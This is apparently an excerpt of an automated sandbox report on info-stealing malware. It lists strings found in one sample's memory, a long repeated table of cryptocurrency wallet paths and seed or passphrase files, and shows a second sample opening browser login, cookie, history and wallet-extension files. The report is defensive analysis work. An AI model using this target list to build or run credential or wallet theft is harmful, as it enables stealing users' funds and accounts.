Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: ea17d0b77a.exe, 0000002F.00000003.3395976847.00000000010F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                    Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: ea17d0b77a.exe, 0000002F.00000003.3396146469.00000000010E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: ea17d0b77a.exe, 0000002F.00000003.3395976847.00000000010F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
